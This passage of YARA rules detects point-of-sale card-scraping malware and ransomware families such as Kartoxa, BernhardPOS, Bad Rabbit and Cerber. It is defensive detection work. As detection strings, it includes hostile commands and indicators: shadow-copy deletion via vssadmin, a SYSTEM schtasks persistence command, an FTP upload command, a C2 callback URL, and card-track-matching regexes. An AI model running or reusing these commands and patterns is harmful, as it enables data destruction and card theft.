    $s1 = "KAPTOXA"
    $s2 = "cmd /c net start %s"
    $s3 = "pid:"
    $s4 = "%ADD%"
    $s5 = "COMSPEC"
    $s6 = "KARTOXA"
  condition:
    uint16(0) == 23117 and 3 of ($s*)
}

rule unknown {
  meta:
    author = "@patrickrolsen"
    reference = "Unknown POS"
  strings:
    $s1 = "a.exe" wide
    $s2 = "Can anyone test" wide
    $s3 = "I m in computer class now" wide
  condition:
    uint16(0) == 23117 and 3 of ($s*)
}

rule regex_pos {
  meta:
    author = "@patrickrolsen"
    reference = "POS malware - Regex"
  strings:
    $n1 = "REGEXEND" nocase
    $n2 = "RegExpr" nocase
    $n3 = "regex"
    $s4 = "[1-5][0-9]{14}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
    $s5 = "[47][0-9]{13}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
    $s6 = "(?:0[0-5]|[68][0-9])[0-9]{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
    $s7 = "(?:011|5[0-9]{2})[0-9]{12}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
    $s8 = "(?:2131|1800|35\\d{3})\\d{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
    $s9 = "([0-9]{15,16}[D=](0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9]{8,30})"
    $s10 = "((b|B)[0-9]{13,19}\\^[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\\s]{3,50}[0-9]{1})"
    $s11 = "[0-9]*\\^[a-zA-Z]*/[a-zA-Z ]*\\^[0-9]*"
    $s12 = "\\d{15,19}=\\d{13,}"
    $s13 = "\\;?[3-9]{1}[0-9]{12,19}[D=\\u0061][0-9]{10,30}\\??"
    $s14 = "[0-9]{12}(?:[0-9]{3})?=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
  condition:
    uint16(0) == 23117 and 1 of ($n*) and 1 of ($s*)
}

rule regexpr_pos {
  meta:
    author = "@patrickrolsen"
    reference = "POS malware - RegExpr"
  strings:
    $s1 = "RegExpr" nocase
    $s2 = "Data.txt"
    $s3 = "Track1"
    $s4 = "Track2"
  condition:
    uint16(0) == 23117 and 3 of ($s*)
}

rule reg_pos {
  meta:
    author = "@patrickrolsen"
    reference = "POS malware - RegExpr"
  strings:
    $s1 = "T1_FOUND: %s"
    $s2 = "id=%s&log=%s"
    $s3 = "\\d{15,19}=\\d{13,}"
  condition:
    uint16(0) == 23117 and 2 of ($s*)
}

rule sets_pos {
  meta:
    author = "@patrickrolsen"
    reference = "POS malware - Sets"
  strings:
    $s1 = "GET /sets.txt"
  condition:
    uint16(0) == 23117 and $s1
}

rule monitor_tool_pos {
  meta:
    author = "@patrickrolsen"
    reference = "POS malware - Monitoring Tool??"
  strings:
    $s1 = "RCPT TO"
    $s2 = "MAIL FROM"
    $s3 = "AUTH LOGIN"
    $s4 = "Reply-To"
    $s5 = "X-Mailer"
    $s6 = "crypto"
    $s7 = "test335.txt" wide
    $s8 = "/c del"
  condition:
    uint16(0) == 23117 and 7 of ($s*)
}

rule pstgdump {
  meta:
    author = "@patrickrolsen"
    reference = "pstgdump"
  strings:
    $s1 = "fgdump\\pstgdump"
    $s2 = "pstgdump"
    $s3 = "Outlook"
  condition:
    uint16(0) == 23117 and all of ($s*)
}

rule keyfinder_tool {
  meta:
    author = "@patrickrolsen"
    reference = "Magical Jelly Bean KeyFinder"
  strings:
    $s1 = "chgxp.vbs"
    $s2 = "officekey.exe"
    $s3 = "findkey.exe"
    $s4 = "xpkey.exe"
  condition:
    uint16(0) == 23117 and 2 of ($s*)
}

rule memdump_diablo {
  meta:
    author = "@patrickrolsen"
    reference = "Process Memory Dumper - DiabloHorn"
  strings:
    $s1 = "DiabloHorn"
    $s2 = "Process Memory Dumper"
    $s3 = "pid-%s.dmp"
    $s4 = "Pid %d in not acessible"
    $s5 = "memdump.exe"
    $s6 = "%s-%d.dmp"
  condition:
    uint16(0) == 23117 and 3 of ($s*)
}

rule blazingtools {
  meta:
    author = "@patrickrolsen"
    reference = "Blazing Tools - http://www.blazingtools.com (Keyloggers)"
  strings:
    $s1 = "blazingtools.com"
    $s2 = "Keystrokes" wide
    $s3 = "Screenshots" wide
  condition:
    uint16(0) == 23117 and all of ($s*)
}

rule sysocmgr {
  meta:
    author = "@patrickrolsen"
    reference = "System stand-alone Optional Component Manager - http://support.microsoft.com/kb/222444"
  strings:
    $s1 = "SYSOCMGR.EXE" wide
    $s2 = "System stand-alone Optional Component Manager" wide
  condition:
    uint16(0) == 23117 and all of ($s*)
}

rule lacy_keylogger {
  meta:
    author = "@patrickrolsen"
    reference = "Appears to be a form of keylogger."
  strings:
    $s1 = "Lacy.exe" wide
    $s2 = "Bldg Chive Duel Rip Query" wide
  condition:
    uint16(0) == 23117 and all of ($s*)
}

rule searchinject {
  meta:
    author = "@patrickrolsen"
    reference = "Usage: SearchInject <PID1>[PID2][PID3] - It loads Searcher.dll (appears to be hard coded)"
  strings:
    $s1 = "SearchInject"
    $s2 = "inject base:"
    $s3 = "Searcher.dll" nocase
  condition:
    uint16(0) == 23117 and all of ($s*)
}

rule heistenberg_pos {
  meta:
    author = "@patrickrolsen"
    reference = "POS Malware"
  strings:
    $s1 = "KARTOXA"
    $s2 = "dmpz.log"
    $s3 = "/api/process.php?xy="
    $s4 = "User-Agent: PCICompliant"
    $s6 = "%s:*:Enabled:%s"
  condition:
    uint16(0) == 23117 and 3 of ($s*)
}

rule pos_jack {
  meta:
    author = "@patrickrolsen"
    maltype = "Point of Sale (POS) Malware"
    version = "0.1"
    reference = "http://blog.spiderlabs.com/2014/02/jackpos-the-house-always-wins.html"
    date = "2/22/2014"
  strings:
    $pdb1 = "\\ziedpirate.ziedpirate-PC\\"
    $pdb2 = "\\sop\\sop\\"
  condition:
    uint16(0) == 23117 and 1 of ($pdb*)
}

rule pos_memory_scrapper_ {
  meta:
    author = "@patrickrolsen"
    maltype = "Point of Sale (POS) Malware Memory Scraper"
    version = "0.3"
    description = "POS Memory Scraper"
    date = "01/30/2014"
  strings:
    $s1 = "kartoxa" nocase
    $s2 = "CC2 region:"
    $s3 = "CC memregion:"
    $s4 = "target pid:"
    $s5 = "scan all processes:"
    $s6 = "<pid> <PATTERN>"
    $s7 = "KAPTOXA"
    $s8 = "ATTERN"
    $s9 = "\\svhst%p"
  condition:
    uint16(0) == 23117 and 3 of ($s*)
}

rule pos_malwre_dexter_stardust {
  meta:
    author = "@patrickrolsen"
    maltype = "Dexter Malware - StarDust Variant"
    version = "0.1"
    description = "Table 2 arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf"
    reference = "16b596de4c0e4d2acdfdd6632c80c070, 2afaa709ef5260184cbda8b521b076e1, and e3dd1dc82ddcfaf410372ae7e6b2f658"
    date = "12/30/2013"
  strings:
    $s1 = "ceh_3\\.\\ceh_4\\..\\ceh_6"
    $s2 = "Yatoed3fe3rex23030am39497403"
    $s3 = "Poo7lo276670173quai16568unto1828Oleo9eds96006nosysump7hove19"
    $s4 = "CommonFile.exe"
  condition:
    uint16(0) == 23117 and all of ($s*)
}

rule pos_malware_project_hook {
  meta:
    author = "@patrickrolsen"
    maltype = "Project Hook"
    version = "0.1"
    description = "Table 1 arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf"
    reference = "759154d20849a25315c4970fe37eac59"
    date = "12/30/2013"
  strings:
    $s1 = "CallImage.exe"
    $s2 = "BurpSwim"
    $s3 = "Work\\Project\\Load"
    $s4 = "WortHisnal"
  condition:
    uint16(0) == 23117 and all of ($s*)
}

rule pdb_strings_Rescator {
  meta:
    author = "@patrickrolsen"
    maltype = "Target Attack"
    version = "0.3"
    description = "Rescator PDB strings within binaries"
    date = "01/30/2014"
  strings:
    $pdb1 = "\\Projects\\Rescator" nocase
  condition:
    uint16(0) == 23117 and $pdb1
}

rule pos_uploader {
  meta:
    author = "@patrickrolsen"
    maltype = "Point of Sale (POS) Malware"
    reference = "http://blogs.mcafee.com/mcafee-labs/analyzing-the-target-point-of-sale-malware"
    version = "0.1"
    description = "Testing the base64 encoded file in sys32"
    date = "01/30/2014"
  strings:
    $s1 = "cmd /c net start %s"
    $s2 = "ftp -s:%s"
    $s3 = "data_%d_%d_%d_%d_%d.txt"
    $s4 = "\\uploader\\"
  condition:
    uint16(0) == 23117 and all of ($s*)
}

rule winxml_dll {
  meta:
    author = "@patrickrolsen"
    maltype = "Point of Sale (POS) Malware"
    reference = "ce0296e2d77ec3bb112e270fc260f274"
    version = "0.1"
    description = "Testing the base64 encoded file in sys32"
    date = "01/30/2014"
  strings:
    $s1 = "\\system32\\winxml.dll"
  condition:
    uint16(0) == 23117 and (all of ($s*))
}

rule pos_chewbacca {
  meta:
    author = "@patrickrolsen"
    maltype = "Point of Sale (POS) Malware"
    reference = "https://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_based_Malware"
    hashes = "21f8b9d9a6fa3a0cd3a3f0644636bf09, 28bc48ac4a92bde15945afc0cee0bd54"
    version = "0.2"
    description = "Testing the base64 encoded file in sys32"
    date = "01/30/2014"
  strings:
    $s1 = "tor -f <torrc>"
    $s2 = "tor_"
    $s3 = "umemscan"
    $s4 = "CHEWBAC"
  condition:
    uint16(0) == 23117 and (all of ($s*))
}

rule BernhardPOS {
  meta:
    author = "Nick Hoffman / Jeremy Humble"
    last_update = "2015-07-14"
    source = "Morphick Inc."
    description = "BernhardPOS Credit Card dumping tool"
    reference = "http://morphick.com/blog/2015/7/14/bernhardpos-new-pos-malware-discovered-by-morphick"
    md5 = "e49820ef02ba5308ff84e4c8c12e7c3d"
    score = 70
  strings:
    $shellcode_kernel32_with_junk_code = { 33 C0 83 ?? ?? 83 ?? ?? 64 A1 30 00 00 00 83 ?? ?? 83 ?? ?? 8B 40 0C 83 ?? ?? 83 ?? ?? 8B 40 14 83 ?? ?? 83 ?? ?? 8B 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8B 00 83 ?? ?? 83 ?? ?? 8B 40 10 83 ?? ?? }
    $mutex_name = "OPSEC_BERNHARD"
    $build_path = "C:\\bernhard\\Debug\\bernhard.pdb"
    $string_decode_routine = { 55 8B EC 83 EC 50 53 56 57 A1 ?? ?? ?? ?? 89 45 F8 66 8B 0D ?? ?? ?? ?? 66 89 4D FC 8A 15 ?? ?? ?? ?? 88 55 FE 8D 45 F8 50 FF ?? ?? ?? ?? ?? 89 45 F0 C7 45 F4 00 00 00 00 ?? ?? 8B 45 F4 83 C0 01 89 45 F4 8B 45 08 50 FF ?? ?? ?? ?? ?? 39 45 F4 ?? ?? 8B 45 08 03 45 F4 0F BE 08 8B 45 F4 99 F7 7D F0 0F BE 54 15 F8 33 CA 8B 45 08 03 45 F4 88 08 ?? ?? 5F 5E 5B 8B E5 5D }
  condition:
    any of them
}

rule POS_bruteforcing_bot {
  meta:
    maltype = "botnet"
    ref = "https://github.com/reed1713"
    reference = "http://www.alienvault.com/open-threat-exchange/blog/botnet-bruteforcing-point-of-sale-via-remote-desktop"
    date = "3/11/2014"
    description = "botnet bruteforcing POS terms via RDP"
  strings:
    $type = "Microsoft-Windows-Security-Auditing"
    $eventid = "4688"
    $data = "\\AppData\\Roaming\\lsacs.exe"
  condition:
    all of them
}

rule easterjackpos {
  meta:
    author = "Brian Wallace @botnet_hunter"
    author_email = "bwall@ballastsecurity.net"
    date = "2014-09-02"
    description = "Identify JackPOS"
  strings:
    $s1 = "updateinterval="
    $s2 = "cardinterval="
    $s3 = "{[!17!]}{[!18!]}"
  condition:
    all of them
}

rule PoS_Malware_fastpos : FastPOS POS keylogger {
  meta:
    author = "Trend Micro, Inc."
    date = "2016-05-18"
    description = "Used to detect FastPOS keyloggger + scraper"
    reference = "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf"
    sample_filetype = "exe"
  strings:
    $string1 = "uniqyeidclaxemain"
    $string2 = "http://%s/cdosys.php"
    $string3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
    $string4 = "\\The Hook\\Release\\The Hook.pdb" nocase
  condition:
    all of ($string*)
}

rule LogPOS {
  meta:
    author = "Morphick Security"
    description = "Detects Versions of LogPOS"
    md5 = "af13e7583ed1b27c4ae219e344a37e2b"
  strings:
    $mailslot = "\\\\.\\mailslot\\LogCC"
    $get = "GET /%s?encoding=%c&t=%c&cc=%I64d&process="
    $sc = { 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 }
  condition:
    $sc and 1 of ($mailslot, $get)
}

rule PoS_Malware_MalumPOS {
  meta:
    author = "Trend Micro, Inc."
    date = "2015-05-25"
    description = "Used to detect MalumPOS memory dumper"
    sample_filtype = "exe"
  strings:
    $string1 = "SOFTWARE\\Borland\\Delphi\\RTL"
    $string2 = "B)[0-9]{13,19}\\"
    $string3 = "[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\"
    $string4 = "TRegExpr(exec): ExecNext Without Exec[Pos]"
    $string5 = /Y:\\PROGRAMS\\.{20,300}\.pas/
  condition:
    all of ($string*)
}

rule Mozart {
  meta:
    author = "Nick Hoffman - Morphick Inc"
    description = "Detects samples of the Mozart POS RAM scraping utility"
    reference = "http://securitykitten.github.io/the-mozart-ram-scraper/"
  strings:
    $pdb = "z:\\Slender\\mozart\\mozart\\Release\\mozart.pdb" ascii wide nocase
    $output = { 67 61 72 62 61 67 65 2E 74 6D 70 00 }
    $service_name = "NCR SelfServ Platform Remote Monitor" ascii wide nocase
    $service_name_short = "NCR_RemoteMonitor"
    $encode_data = { B8 08 10 00 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 55 8B AC 24 14 10 00 00 89 84 24 0C 10 00 00 56 8B C5 33 F6 33 DB 8D 50 01 8D A4 24 00 00 00 00 8A 08 40 84 C9 ?? ?? 2B C2 89 44 24 0C ?? ?? 8B 94 24 1C 10 00 00 57 8B FD 2B FA 89 7C 24 10 ?? ?? 8B 7C 24 10 8A 04 17 02 86 E0 BA 40 00 88 02 B8 ?? ?? ?? ?? 46 8D 78 01 8D A4 24 00 00 00 00 8A 08 40 84 C9 ?? ?? 2B C7 3B F0 ?? ?? 33 F6 8B C5 43 42 8D 78 01 8A 08 40 84 C9 ?? ?? 2B C7 3B D8 ?? ?? 5F 8B B4 24 1C 10 00 00 8B C5 C6 04 33 00 8D 50 01 8A 08 40 84 C9 ?? ?? 8B 8C 24 20 10 00 00 2B C2 51 8D 54 24 14 52 50 56 E8 ?? ?? ?? ?? 83 C4 10 8B D6 5E 8D 44 24 0C 8B C8 5D 2B D1 5B 8A 08 88 0C 02 40 84 C9 ?? ?? 8B 8C 24 04 10 00 00 E8 ?? ?? ?? ?? 81 C4 08 10 00 00 }
  condition:
    any of ($pdb, $output, $encode_data) or all of ($service*)
}

rule Ransom_CryptXXX_Dropper {
  meta:
    description = "Regla para detectar RANSOM.CRYPTXXX"
    author = "CCN-CERT"
    version = "1.0"
    ref = "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/4002-publicado-el-informe-del-codigo-danino-ransom-cryptxxx.html"
  strings:
    $a = { 50 65 31 57 58 43 46 76 59 62 48 6F 35 }
    $b = { 43 00 3A 00 5C 00 42 00 49 00 45 00 52 00 5C 00 51 00 6D 00 6B 00 4E 00 52 00 4C 00 46 00 00 }
  condition:
    all of them
}

rule Ransom_CryptXXX_Real {
  meta:
    description = "Regla para detectar Ransom.CryptXXX original"
    author = "CCN-CERT"
    version = "1.0"
    ref = "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/4002-publicado-el-informe-del-codigo-danino-ransom-cryptxxx.html"
  strings:
    $a = { 52 59 47 40 4A 41 59 5D 52 00 00 00 FF FF FF FF }
    $b = { 06 00 00 00 52 59 47 40 40 5A 00 00 FF FF FF FF }
    $c = { 0A 00 00 00 52 5C 4B 4D 57 4D 42 4B 5C 52 00 00 }
    $d = { FF FF FF FF 0A 00 00 00 52 5D 57 5D 5A 4B 43 70 }
    $e = { 3F 52 00 00 FF FF FF FF 06 00 00 00 52 4C 41 41 }
    $f = { 5A 52 00 00 FF FF FF FF 0A 00 00 00 52 5C 4B 4D }
    $g = { 41 58 4B 5C 57 52 00 00 FF FF FF FF 0E 00 00 00 }
    $h = { 52 2A 5C 4B 4D 57 4D 42 4B 20 4C 47 40 52 00 00 }
    $i = { FF FF FF FF 0A 00 00 00 52 5E 4B 5C 48 42 41 49 }
    $j = { 5D 52 00 00 FF FF FF FF 05 00 00 00 52 4B 48 47 }
    $k = { 52 00 00 00 FF FF FF FF 0C 00 00 00 52 4D 41 40 }
    $l = { 48 47 49 20 43 5D 47 52 00 00 00 00 FF FF FF FF }
    $m = { 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 3F 52 00 00 }
    $n = { FF FF FF FF 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 }
    $o = { 3C 52 00 00 FF FF FF FF 08 00 00 00 52 49 41 41 }
    $p = { 49 42 4B 52 00 00 00 00 FF FF FF FF 06 00 00 00 }
    $q = { 52 5A 4B 43 5E 52 00 00 FF FF FF FF 08 00 00 00 }
    $v = { 52 48 3A 4C 4D 70 3F 52 00 00 00 00 FF FF FF FF }
    $w = { 0A 00 00 00 52 4F 42 42 5B 5D 4B 70 3F 52 00 00 }
    $x = { FF FF FF FF 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 }
    $y = { 3F 52 00 00 FF FF FF FF 0A 00 00 00 52 5E 5C 41 }
    $z = { 49 5C 4F 70 3C 52 00 00 FF FF FF FF 09 00 00 00 }
    $aa = { 52 4F 5E 5E 4A 4F 5A 4F 52 00 00 00 FF FF FF FF }
    $ab = { 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 3D 52 00 00 }
    $ac = { FF FF FF FF 08 00 00 00 52 5E 5B 4C 42 47 4D 52 }
  condition:
    all of them
}

rule legion_777 {
  meta:
    author = "Daxda (https://github.com/Daxda)"
    date = "2016/6/6"
    description = "Detects an UPX-unpacked .777 ransomware binary."
    ref = "https://github.com/Daxda/malware-analysis/tree/master/malware_samples/legion"
    category = "Ransomware"
    sample = "SHA256: 14d22359e76cf63bf17268cad24bac03663c8b2b8028b869f5cec10fe3f75548"
  strings:
    $s1 = "http://tuginsaat.com/wp-content/themes/twentythirteen/stats.php"
    $s2 = "read_this_file.txt" wide
    $s3 = "seven_legion@india.com"
    $s4 = { 46 4F 52 20 44 45 43 52 59 50 54 20 46 49 4C 45 53 0D 0A 53 45 4E 44 20 4F 4E 45 20 46 49 4C 45 20 49 4E 20 45 2D 4D 41 49 4C 0D 0A 73 65 76 65 6E 5F 6C 65 67 69 6F 6E 40 69 6E 64 69 61 2E 63 6F 6D }
    $s5 = "%s._%02i-%02i-%02i-%02i-%02i-%02i_$%s$.777"
  condition:
    4 of ($s*)
}

rule Ransom_Alpha {
  meta:
    description = "Regla para detectar Ransom.Alpha (posibles falsos positivos)"
    author = "CCN-CERT"
    version = "1.0"
  strings:
    $a = { 52 00 65 00 61 00 64 00 20 00 4D 00 65 00 20 00 28 00 48 00 6F 00 77 00 20 00 44 00 65 00 63 }
  condition:
    $a
}

rule Ransom_Alfa {
  meta:
    description = "Regla para detectar W32/Filecoder.Alfa (Posibles falsos positivos)"
    author = "CCN-CERT"
    version = "1.0"
  strings:
    $a = { 8B 0C 97 81 E1 FF FF 00 00 81 F9 19 04 00 00 74 0F 81 F9 }
    $b = { 22 04 00 00 74 07 42 3B D0 7C E2 EB 02 }
  condition:
    all of them
}

rule sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 {
  meta:
    description = "Bad Rabbit Ransomware"
    author = "Christiaan Beek"
    reference = "BadRabbit"
    date = "2017-10-24"
    hash1 = "8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93"
    source = "https://pastebin.com/Y7pJv3tK"
  strings:
    $x1 = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" wide fullword
    $x2 = "need to do is submit the payment and get the decryption password." ascii fullword
    $s3 = "If you have already got the password, please enter it below." ascii fullword
    $s4 = "dispci.exe" wide fullword
    $s5 = "\\\\.\\GLOBALROOT\\ArcName\\multi(0)disk(0)rdisk(0)partition(1)" wide fullword
    $s6 = "Run DECRYPT app at your desktop after system boot" ascii fullword
    $s7 = "Enter password#1: " wide fullword
    $s8 = "Enter password#2: " wide fullword
    $s9 = "C:\\Windows\\cscc.dat" wide fullword
    $s10 = "schtasks /Delete /F /TN %ws" wide fullword
    $s11 = "Password#1: " ascii fullword
    $s12 = "\\AppData" wide fullword
    $s13 = "Readme.txt" wide fullword
    $s14 = "Disk decryption completed" wide fullword
    $s15 = "Files decryption completed" wide fullword
    $s16 = "http://diskcryptor.net/" wide fullword
    $s17 = "Your personal installation key#1:" ascii fullword
    $s18 = ".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg." wide
    $s19 = "Disable your anti-virus and anti-malware programs" wide fullword
    $s20 = "bootable partition not mounted" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 409600 and pe.imphash() == "94f57453c539227031b918edd52fc7f1" and (1 of ($x*) or 4 of them)) or (all of them)
}

rule cerber3 {
  meta:
    author = "pekeinfo"
    date = "2016-09-09"
    description = "Cerber3 "
  strings:
    $a = { 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85 }
    $b = { 68 3B DB 00 00 ?? ?? ?? ?? 00 ?? FF 15 }
  condition:
    1 of them
}

rule cerber4 {
  meta:
    author = "pekeinfo"
    date = "2016-09-09"
    description = "Cerber4"
  strings:
    $a = { 8B 0D ?? ?? 43 00 51 8B 15 ?? ?? 43 00 52 E8 C9 04 00 00 83 C4 08 89 45 FC A1 ?? ?? 43 00 3B 05 ?? ?? 43 00 72 02 }
  condition:
    1 of them
}

rule cerber5 {
  meta:
    author = "pekeinfo"
    date = "2016-12-02"
    description = "Cerber5"
  strings:
    $a = { 83 C4 04 A3 ?? ?? ?? 00 C7 45 ?? ?? ?? ?? 00 8B ?? ?? C6 0? 56 8B ?? ?? 5? 68 ?? ?? 4? 00 FF 15 ?? ?? 4? 00 50 FF 15 ?? ?? 4? 00 A3 ?? ?? 4? 00 68 1D 10 00 00 E8 ?? ?? FF FF 83 C4 04 ?? ?? ?? }
  condition:
    1 of them
}

rule cerber5b {
  meta:
    author = "pekeinfo"
    date = "2016-12-20"
    description = "Cerber5b"
  strings:
    $a = { 8B ?? ?8 ?? 4? 00 83 E? 02 89 ?? ?8 ?? 4? 00 68 ?C ?9 4? 00 [0-6] ?? ?? ?? ?? ?? ?8 ?? 4? 00 5? FF 15 ?? ?9 4? 00 89 45 ?4 83 7D ?4 00 75 02 EB 12 8B ?? ?0 83 C? 06 89 ?? ?0 B? DD 03 00 00 85 }
  condition:
    $a
}

rule ransom_comodosec_mrcr1 {
  meta:
    author = " J from THL <j@techhelplist.com>"
    date = "2017/01"
    reference = "https://virustotal.com/en/file/75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa/analysis/"
    version = 1
    maltype = "Ransomware"
    filetype = "memory"
  strings:
    $text01 = "WebKitFormBoundary"
    $text02 = "Start NetworkScan"
    $text03 = "Start DriveScan"
    $text04 = "Start CryptFiles"
    $text05 = "cmd /c vssadmin delete shadows /all /quiet"
    $text06 = "isAutorun:"
    $text07 = "isNetworkScan:"
    $text08 = "isUserDataLast:"
    $text09 = "isCryptFileNames:"
    $text10 = "isChangeFileExts:"
    $text11 = "isPowerOffWindows:"
    $text12 = "GatePath:"
    $text13 = "GatePort:"
    $text14 = "DefaultCryptKey:"
    $text15 = "UserAgent:"
    $text16 = "Mozilla_"
    $text17 = "On Error Resume Next"
    $text18 = "Content-Disposition: form-data; name=\"uid\""
    $text19 = "Content-Disposition: form-data; name=\"uname\""
    $text20 = "Content-Disposition: form-data; name=\"cname\""
    $regx21 = /\|[0-9a-z]{2,5}\|\|[0-9a-z]{2,5}\|\|[0-9a-z]{2,5}\|\|[0-9a-z]{2,5}\|/
  condition:
    10 of them
}

rule Ransom : Crypren {
  meta:
    weight = 1
    Author = "@pekeinfo"
    reference = "https://github.com/pekeinfo/DecryptCrypren"
  strings:
    $a = "won't be able to recover your files anymore.</p>"
    $b = { 6A 03 68 ?? ?? ?? ?? B9 74 F1 AE 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 98 3A 00 00 FF D6 6A 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? }
    $c = "Please restart your computer and wait for instructions for decrypting your files"
  condition:
    any of them
}

rule cryptonar_ransomware {
  meta:
    description = "Rule to detect CryptoNar Ransomware"
    author = "Marc Rivero | @seifreed"
    reference = "https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/"
  strings:
    $s1 = "C:\\narnar\\CryptoNar\\CryptoNarDecryptor\\obj\\Debug\\CryptoNar.pdb" ascii fullword
    $s2 = "CryptoNarDecryptor.exe" wide fullword
    $s3 = "server will eliminate the key after 72 hours since its generation (since the moment your computer was infected). Once this has " ascii fullword
    $s4 = "Do not delete this file, else the decryption process will be broken" wide fullword
    $s5 = "key you received, and wait until the decryption process is done." ascii fullword
    $s6 = "In order to receive your decryption key, you will have to pay $200 in bitcoins to this bitcoin address: [bitcoin address]" ascii fullword
    $s7 = "Decryption process failed" wide fullword
    $s8 = "CryptoNarDecryptor.KeyValidationWindow.resources" ascii fullword
    $s9 = "Important note: Removing CryptoNar will not restore access to your encrypted files." ascii fullword
    $s10 = "johnsmith987654@tutanota.com" wide fullword
    $s11 = "Decryption process will start soon" wide fullword
    $s12 = "CryptoNarDecryptor.DecryptionProgressBarForm.resources" ascii fullword
    $s13 = "DecryptionProcessProgressBar" wide fullword
    $s14 = "CryptoNarDecryptor.Properties.Resources.resources" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000) and all of them
}

rule CryptoLocker_set1 {
  meta:
    author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
    date = "2014-04-13"
    description = "Detection of Cryptolocker Samples"
  strings:
    $string0 = "static"
    $string1 = " kscdS"
    $string2 = "Romantic"
    $string3 = "CompanyName" wide
    $string4 = "ProductVersion" wide
    $string5 = "9%9R9f9q9"
    $string6 = "IDR_VERSION1" wide
    $string7 = "  </trustInfo>"
    $string8 = "LookFor" wide
    $string9 = ":n;t;y;"
    $string10 = "        <requestedExecutionLevel level"
    $string11 = "VS_VERSION_INFO" wide
    $string12 = "2.0.1.0" wide
    $string13 = "<assembly xmlns"
    $string14 = "  <trustInfo xmlns"
    $string15 = "srtWd@@"
    $string16 = "515]5z5"
    $string17 = "C:\\lZbvnoVe.exe" wide
  condition:
    12 of ($string*)
}

rule CryptoLocker_rule2 {
  meta:
    author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
    date = "2014-04-14"
    description = "Detection of CryptoLocker Variants"
  strings:
    $string0 = "2.0.1.7" wide
    $string1 = "    <security>"
    $string2 = "Romantic"
    $string3 = "ProductVersion" wide
    $string4 = "9%9R9f9q9"
    $string5 = "IDR_VERSION1" wide
    $string6 = "button"
    $string7 = "    </security>"
    $string8 = "VFileInfo" wide
    $string9 = "LookFor" wide
    $string10 = "      </requestedPrivileges>"
    $string11 = " uiAccess"
    $string12 = "  <trustInfo xmlns"
    $string13 = "last.inf"
    $string14 = " manifestVersion"
    $string15 = "FFFF04E3" wide
    $string16 = "3,31363H3P3m3u3z3"
  condition:
    12 of ($string*)
}

rule SVG_LoadURL {
  meta:
    description = "Detects a tiny SVG file that loads an URL (as seen in CryptoWall malware infections)"
    author = "Florian Roth"
    reference = "http://goo.gl/psjCCc"
    date = "2015-05-24"
    hash1 = "ac8ef9df208f624be9c7e7804de55318"
    hash2 = "3b9e67a38569ebe8202ac90ad60c52e0"
    hash3 = "7e2be5cc785ef7711282cea8980b9fee"
    hash4 = "4e2c6f6b3907ec882596024e55c2b58b"
    score = 50
  strings:
    $s1 = "</svg>" nocase
    $s2 = "<script>" nocase
    $s3 = "location.href='http" nocase
  condition:
    all of ($s*) and filesize < 600
}

rule BackdoorFCKG : CTB_Locker_Ransomware {
  meta:
    author = "ISG"
    date = "2015-01-20"
    reference = "https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker"
    description = "CTB_Locker"
  strings:
    $string0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    $stringl = "RNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    $string2 = "keme132.DLL"
    $string3 = "klospad.pdb"
  condition:
    3 of them
}

rule DMALocker : ransom {
  meta:
    Description = "Deteccion del ransomware DMA Locker desde la version 1.0 a la 4.0"
    ref = "https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/"
    Author = "SadFud"
    Date = "30/05/2016"
  strings:
    $uno = { 41 42 43 58 59 5A 31 31 }
    $dos = { 21 44 4D 41 4C 4F 43 4B }
